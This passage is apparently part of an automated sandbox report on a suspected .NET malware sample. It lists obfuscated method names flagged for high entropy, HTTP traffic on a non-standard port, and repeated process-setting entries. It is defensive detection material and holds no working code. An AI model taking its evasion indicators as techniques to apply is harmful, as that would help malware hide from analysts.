Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, gtnGf6eZaUheLNbBxJ.cs	High entropy of concatenated method names: 'Jo2Hm1eEeT', 'L09Hib9ZWB', 'FkGHB0sd39', 'RKtHtf1S9n', 'KeuHonp9PR', 'c8VHANchfk', 'kL1y6ltqS6ZObfOP6u', 'Is3J7IH3uvCJBkZ4Jj', 'mQiHHAVH1L', 'IUXHxLMpeP'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, DXOBWilf8EP1S4IcBo.cs	High entropy of concatenated method names: 'FVLvo8F16Z', 'YZbvKbmUbH', 'dn1vvE5r0E', 'CUfvk5hA26', 'DWavDb0YVX', 'f9Cv9kMAGi', 'Dispose', 'n37TJB5OrW', 'wlxTORNpon', 'D1ZThOAk9P'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, wWGiU5H1Ei84k8bex0r.cs	High entropy of concatenated method names: 'ToString', 'MiwkNXUyoo', 'efjkunvbqJ', 'NUiky3iS6F', 'uWmkq7Xi16', 'xqkkMJxpQ9', 'ECakZUUtyu', 'o21kEHLsZX', 'bLpcPRRGF9qjWRHi5cP', 'PdMjepRI9o6ZwhO34db'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	High entropy of concatenated method names: 'kdmORPPYva', 'gA8OwaN0hU', 'mDlO3ZHiBZ', 'TeXOpgPYuj', 'WuCOL76Juk', 'BMAO5QLIvb', 'wZ3Ol4iThj', 'pjyOgQ4QB9', 'xxjO6VmMw3', 'Y74O7Y9sid'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, KBdV4XOi4PpjoJHOMa.cs	High entropy of concatenated method names: 'Dispose', 'IP1H6S4IcB', 'hbJ1MDxRFm', 'fJaabJVRNU', 'o19H7cHGJo', 'xJQHz9Acqc', 'ProcessDialogKey', 'lyO1PnC4U3', 'YrN1HO1DaP', 'P0g11MpsXv'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, IpWEnNWLMAB3gG7uMW.cs	High entropy of concatenated method names: 'GyjdNmx6G4', 'CblduymoWN', 'zgcdqgocsJ', 'l0hdMMKMIu', 'RWfdEEkIAa', 'D7Ndnef7sq', 'YnbdSoSs4Y', 'AOtd4VNXy4', 'Jv7dVcAwMK', 'VMJdGpiK79'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, cS9nUdylS96XfSeunp.cs	High entropy of concatenated method names: 'xIrXcV1Rcm', 'OToXFc10Yo', 'PDJhZOrsOB', 'DsxhEYBUe1', 'pF5hnxkLjZ', 'A3ihI3tOoc', 'NQuhS34dVZ', 'CXlh4EB3HK', 'WAuhreUgaF', 'iDKhVhIDOp'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, hGp5BZpcONDkD3rFIh.cs	High entropy of concatenated method names: 'zkfKBrMmc6', 'CMJKtdTixl', 'ToString', 'GRUKJpvLL2', 'EbXKOWhEn4', 'gPNKhEqG0f', 'mWBKXJS5AF', 'io3KQY9uBg', 'PYCKmD6RW3', 'K0oKiP2iDb'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, CTpjKLHHStIX6nENSqD.cs	High entropy of concatenated method names: 'J0VC7O2PEY', 'QTLCzGo5SI', 'FrBkPDLd0F', 'B6QkHddJZQ', 'BjAk1ybxOu', 'e8ekxZUfsn', 'ykZke2SpQT', 'AM3ka5iDV0', 'PfPkJm7agE', 'PtbkORYwmH'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, DhS7fqukG0sd39wKtf.cs	High entropy of concatenated method names: 'nYShfwcvRI', 'ewmhjUlaNe', 'vwqhN5LwsR', 'P0jhuIFogB', 'SLuhocKTGZ', 'w7vhA9VZH5', 'ekthKYem8h', 'a2lhTd9I1s', 'MVbhvcVHgT', 'c6ChCkI0Sc'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	High entropy of concatenated method names: 'bNlxamUKy4', 'miAxJHaJSO', 'mMexOwQYLh', 'J7Sxh1ExdY', 'utyxXI9rcw', 'm88xQCr2TF', 'rHhxm5Bppa', 'MInxic36Wp', 'HDZxsWiQ3w', 'yLLxBp4ILQ'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, cStMQWrAe62kFjA8iB.cs	High entropy of concatenated method names: 'NVqmU0BYEO', 'jyvmbdIZ6q', 'wWEm8qcJKU', 'mUImfsxBCn', 'ITUmcHac4a', 'D2hmjmEg8a', 'LQYmFuDnyk', 'hRLmN11udK', 'kn0muo1wAZ', 'Ql8my6jStE'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, pNgHLgHeW5AW01sHXe4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UVcYvJEvJ0', 'yBiYCg1YEJ', 'atEYkJVQmh', 'pclYYf0QUb', 'K8KYDxRcMV', 'UuGY20hxxx', 'fOiY96HZ6r'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, tfgn1S3iqgrvDvDCf6.cs	High entropy of concatenated method names: 'ToString', 'pDCAGt35RS', 'WNhAM02Jw0', 'j6OAZKyEEd', 'tn7AE9h7f2', 'gAKAnTroAb', 'k60AIf3bn4', 'jaXASjOQPC', 'nfcA4A9GMD', 'zCNArTDOeO'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, MIhYti525Ikkbjqrcs.cs	High entropy of concatenated method names: 'ADZKg79M1a', 'e7UK78Eyda', 'h9xTPU5hsK', 'rDcTHI9Tqy', 'WbfKG88s9y', 'F5JK0SrJJ5', 'AhRKWLX0Hy', 'gQNKRIUXD7', 'KXkKwDa4u9', 's7hK3MpyTV'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, JR2Okb13aVOWuLqDw8.cs	High entropy of concatenated method names: 'r5x80NXcL', 'keafNoF1W', 'GHajDHZlf', 'gB6F0yF8f', 'EJfutf0Ds', 'tToyT5mhw', 'p3YaNRxkNpMGrWQqjD', 'nK5CqTeVpB2Yd8T1KX', 'Ih8TCeuXA', 'hAJCuJIqX'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, gnC4U367rNO1DaP00g.cs	High entropy of concatenated method names: 'QD4vqphdHN', 'gx8vMLRm20', 'frwvZ1CDlb', 'y8nvEDrbhK', 'kd1vnArc6O', 'SZkvIxDZMD', 'owUvS0cgO1', 'h9av4LI0hP', 'OvWvrBwSqG', 'X50vVb20Xn'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, dpaLf0Re3AGi0r97Pm.cs	High entropy of concatenated method names: 'WUCoVbwx8B', 'heNo0KZjop', 'IHXoRAS3v9', 'C6GownlOrf', 'f3NoMdMDsN', 'e8LoZRNDFG', 'wWHoE2Xt7B', 'w28onnTdOG', 'hOmoII5e1E', 'mJioSV9ONR'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, fsa6uMznVbEZIPKdyx.cs	High entropy of concatenated method names: 'uQACjIUEBT', 'gbECNqgucm', 'auECuOQF5o', 'hfDCqxt4Lb', 'mwuCMpt6VF', 'vYhCElJoqK', 'IewCnDeJcn', 'NefC9rtIhf', 'KrCCUnXlLW', 'H3sCbb9YAx'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, HpsXv37b3vcqkDIH3g.cs	High entropy of concatenated method names: 'MUuChsdQEQ', 'DIrCXFtker', 's8wCQ0GNQV', 'UUJCmqWq63', 'BjCCvTsVxD', 'KYuCite76k', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, xPR18VqNchfk1GBVjj.cs	High entropy of concatenated method names: 'DbeQanGYqC', 'rtyQO5ltSc', 'aq0QXweO2l', 'hPfQmL2UhK', 'iLBQi8Hj7q', 'iGvXLG6cC6', 'h3ZX5Bkxh8', 'HYkXlxR40K', 'SlsXgs9dEr', 'In8X6nml6Z'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, nccvMUSwlgQukfpKG6.cs	High entropy of concatenated method names: 'DQBmJZ20kL', 'M5pmh6laMj', 'fYDmQm43U0', 'rS2Q7pfof4', 'tSQQz4rYow', 'cQ7mPSfRwB', 'DwlmHnVaZr', 'zjRm1Rj4d6', 'Rb3mxbHuj5', 'dVgmeeE3Pn'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, gtnGf6eZaUheLNbBxJ.cs	High entropy of concatenated method names: 'Jo2Hm1eEeT', 'L09Hib9ZWB', 'FkGHB0sd39', 'RKtHtf1S9n', 'KeuHonp9PR', 'c8VHANchfk', 'kL1y6ltqS6ZObfOP6u', 'Is3J7IH3uvCJBkZ4Jj', 'mQiHHAVH1L', 'IUXHxLMpeP'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, DXOBWilf8EP1S4IcBo.cs	High entropy of concatenated method names: 'FVLvo8F16Z', 'YZbvKbmUbH', 'dn1vvE5r0E', 'CUfvk5hA26', 'DWavDb0YVX', 'f9Cv9kMAGi', 'Dispose', 'n37TJB5OrW', 'wlxTORNpon', 'D1ZThOAk9P'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, wWGiU5H1Ei84k8bex0r.cs	High entropy of concatenated method names: 'ToString', 'MiwkNXUyoo', 'efjkunvbqJ', 'NUiky3iS6F', 'uWmkq7Xi16', 'xqkkMJxpQ9', 'ECakZUUtyu', 'o21kEHLsZX', 'bLpcPRRGF9qjWRHi5cP', 'PdMjepRI9o6ZwhO34db'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	High entropy of concatenated method names: 'kdmORPPYva', 'gA8OwaN0hU', 'mDlO3ZHiBZ', 'TeXOpgPYuj', 'WuCOL76Juk', 'BMAO5QLIvb', 'wZ3Ol4iThj', 'pjyOgQ4QB9', 'xxjO6VmMw3', 'Y74O7Y9sid'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, KBdV4XOi4PpjoJHOMa.cs	High entropy of concatenated method names: 'Dispose', 'IP1H6S4IcB', 'hbJ1MDxRFm', 'fJaabJVRNU', 'o19H7cHGJo', 'xJQHz9Acqc', 'ProcessDialogKey', 'lyO1PnC4U3', 'YrN1HO1DaP', 'P0g11MpsXv'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, IpWEnNWLMAB3gG7uMW.cs	High entropy of concatenated method names: 'GyjdNmx6G4', 'CblduymoWN', 'zgcdqgocsJ', 'l0hdMMKMIu', 'RWfdEEkIAa', 'D7Ndnef7sq', 'YnbdSoSs4Y', 'AOtd4VNXy4', 'Jv7dVcAwMK', 'VMJdGpiK79'
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, cS9nUdylS96XfSeunp.cs	High entropy of concatenated method names: 'xIrXcV1Rcm', 'OToXFc10Yo', 'PDJhZOrsOB', 'DsxhEYBUe1', 'pF5hnxkLjZ', 'A3ihI3tOoc', 'NQuhS34dVZ', 'CXlh4EB3HK', 'WAuhreUgaF', 'iDKhVhIDOp'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, hGp5BZpcONDkD3rFIh.cs	High entropy of concatenated method names: 'zkfKBrMmc6', 'CMJKtdTixl', 'ToString', 'GRUKJpvLL2', 'EbXKOWhEn4', 'gPNKhEqG0f', 'mWBKXJS5AF', 'io3KQY9uBg', 'PYCKmD6RW3', 'K0oKiP2iDb'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, CTpjKLHHStIX6nENSqD.cs	High entropy of concatenated method names: 'J0VC7O2PEY', 'QTLCzGo5SI', 'FrBkPDLd0F', 'B6QkHddJZQ', 'BjAk1ybxOu', 'e8ekxZUfsn', 'ykZke2SpQT', 'AM3ka5iDV0', 'PfPkJm7agE', 'PtbkORYwmH'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, DhS7fqukG0sd39wKtf.cs	High entropy of concatenated method names: 'nYShfwcvRI', 'ewmhjUlaNe', 'vwqhN5LwsR', 'P0jhuIFogB', 'SLuhocKTGZ', 'w7vhA9VZH5', 'ekthKYem8h', 'a2lhTd9I1s', 'MVbhvcVHgT', 'c6ChCkI0Sc'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	High entropy of concatenated method names: 'bNlxamUKy4', 'miAxJHaJSO', 'mMexOwQYLh', 'J7Sxh1ExdY', 'utyxXI9rcw', 'm88xQCr2TF', 'rHhxm5Bppa', 'MInxic36Wp', 'HDZxsWiQ3w', 'yLLxBp4ILQ'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, cStMQWrAe62kFjA8iB.cs	High entropy of concatenated method names: 'NVqmU0BYEO', 'jyvmbdIZ6q', 'wWEm8qcJKU', 'mUImfsxBCn', 'ITUmcHac4a', 'D2hmjmEg8a', 'LQYmFuDnyk', 'hRLmN11udK', 'kn0muo1wAZ', 'Ql8my6jStE'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, pNgHLgHeW5AW01sHXe4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UVcYvJEvJ0', 'yBiYCg1YEJ', 'atEYkJVQmh', 'pclYYf0QUb', 'K8KYDxRcMV', 'UuGY20hxxx', 'fOiY96HZ6r'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, tfgn1S3iqgrvDvDCf6.cs	High entropy of concatenated method names: 'ToString', 'pDCAGt35RS', 'WNhAM02Jw0', 'j6OAZKyEEd', 'tn7AE9h7f2', 'gAKAnTroAb', 'k60AIf3bn4', 'jaXASjOQPC', 'nfcA4A9GMD', 'zCNArTDOeO'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, MIhYti525Ikkbjqrcs.cs	High entropy of concatenated method names: 'ADZKg79M1a', 'e7UK78Eyda', 'h9xTPU5hsK', 'rDcTHI9Tqy', 'WbfKG88s9y', 'F5JK0SrJJ5', 'AhRKWLX0Hy', 'gQNKRIUXD7', 'KXkKwDa4u9', 's7hK3MpyTV'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, JR2Okb13aVOWuLqDw8.cs	High entropy of concatenated method names: 'r5x80NXcL', 'keafNoF1W', 'GHajDHZlf', 'gB6F0yF8f', 'EJfutf0Ds', 'tToyT5mhw', 'p3YaNRxkNpMGrWQqjD', 'nK5CqTeVpB2Yd8T1KX', 'Ih8TCeuXA', 'hAJCuJIqX'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, gnC4U367rNO1DaP00g.cs	High entropy of concatenated method names: 'QD4vqphdHN', 'gx8vMLRm20', 'frwvZ1CDlb', 'y8nvEDrbhK', 'kd1vnArc6O', 'SZkvIxDZMD', 'owUvS0cgO1', 'h9av4LI0hP', 'OvWvrBwSqG', 'X50vVb20Xn'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, dpaLf0Re3AGi0r97Pm.cs	High entropy of concatenated method names: 'WUCoVbwx8B', 'heNo0KZjop', 'IHXoRAS3v9', 'C6GownlOrf', 'f3NoMdMDsN', 'e8LoZRNDFG', 'wWHoE2Xt7B', 'w28onnTdOG', 'hOmoII5e1E', 'mJioSV9ONR'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, fsa6uMznVbEZIPKdyx.cs	High entropy of concatenated method names: 'uQACjIUEBT', 'gbECNqgucm', 'auECuOQF5o', 'hfDCqxt4Lb', 'mwuCMpt6VF', 'vYhCElJoqK', 'IewCnDeJcn', 'NefC9rtIhf', 'KrCCUnXlLW', 'H3sCbb9YAx'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, HpsXv37b3vcqkDIH3g.cs	High entropy of concatenated method names: 'MUuChsdQEQ', 'DIrCXFtker', 's8wCQ0GNQV', 'UUJCmqWq63', 'BjCCvTsVxD', 'KYuCite76k', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, xPR18VqNchfk1GBVjj.cs	High entropy of concatenated method names: 'DbeQanGYqC', 'rtyQO5ltSc', 'aq0QXweO2l', 'hPfQmL2UhK', 'iLBQi8Hj7q', 'iGvXLG6cC6', 'h3ZX5Bkxh8', 'HYkXlxR40K', 'SlsXgs9dEr', 'In8X6nml6Z'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, nccvMUSwlgQukfpKG6.cs	High entropy of concatenated method names: 'DQBmJZ20kL', 'M5pmh6laMj', 'fYDmQm43U0', 'rS2Q7pfof4', 'tSQQz4rYow', 'cQ7mPSfRwB', 'DwlmHnVaZr', 'zjRm1Rj4d6', 'Rb3mxbHuj5', 'dVgmeeE3Pn'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, gtnGf6eZaUheLNbBxJ.cs	High entropy of concatenated method names: 'Jo2Hm1eEeT', 'L09Hib9ZWB', 'FkGHB0sd39', 'RKtHtf1S9n', 'KeuHonp9PR', 'c8VHANchfk', 'kL1y6ltqS6ZObfOP6u', 'Is3J7IH3uvCJBkZ4Jj', 'mQiHHAVH1L', 'IUXHxLMpeP'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, DXOBWilf8EP1S4IcBo.cs	High entropy of concatenated method names: 'FVLvo8F16Z', 'YZbvKbmUbH', 'dn1vvE5r0E', 'CUfvk5hA26', 'DWavDb0YVX', 'f9Cv9kMAGi', 'Dispose', 'n37TJB5OrW', 'wlxTORNpon', 'D1ZThOAk9P'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, wWGiU5H1Ei84k8bex0r.cs	High entropy of concatenated method names: 'ToString', 'MiwkNXUyoo', 'efjkunvbqJ', 'NUiky3iS6F', 'uWmkq7Xi16', 'xqkkMJxpQ9', 'ECakZUUtyu', 'o21kEHLsZX', 'bLpcPRRGF9qjWRHi5cP', 'PdMjepRI9o6ZwhO34db'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	High entropy of concatenated method names: 'kdmORPPYva', 'gA8OwaN0hU', 'mDlO3ZHiBZ', 'TeXOpgPYuj', 'WuCOL76Juk', 'BMAO5QLIvb', 'wZ3Ol4iThj', 'pjyOgQ4QB9', 'xxjO6VmMw3', 'Y74O7Y9sid'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, KBdV4XOi4PpjoJHOMa.cs	High entropy of concatenated method names: 'Dispose', 'IP1H6S4IcB', 'hbJ1MDxRFm', 'fJaabJVRNU', 'o19H7cHGJo', 'xJQHz9Acqc', 'ProcessDialogKey', 'lyO1PnC4U3', 'YrN1HO1DaP', 'P0g11MpsXv'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, IpWEnNWLMAB3gG7uMW.cs	High entropy of concatenated method names: 'GyjdNmx6G4', 'CblduymoWN', 'zgcdqgocsJ', 'l0hdMMKMIu', 'RWfdEEkIAa', 'D7Ndnef7sq', 'YnbdSoSs4Y', 'AOtd4VNXy4', 'Jv7dVcAwMK', 'VMJdGpiK79'
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, cS9nUdylS96XfSeunp.cs	High entropy of concatenated method names: 'xIrXcV1Rcm', 'OToXFc10Yo', 'PDJhZOrsOB', 'DsxhEYBUe1', 'pF5hnxkLjZ', 'A3ihI3tOoc', 'NQuhS34dVZ', 'CXlh4EB3HK', 'WAuhreUgaF', 'iDKhVhIDOp'

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49740

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
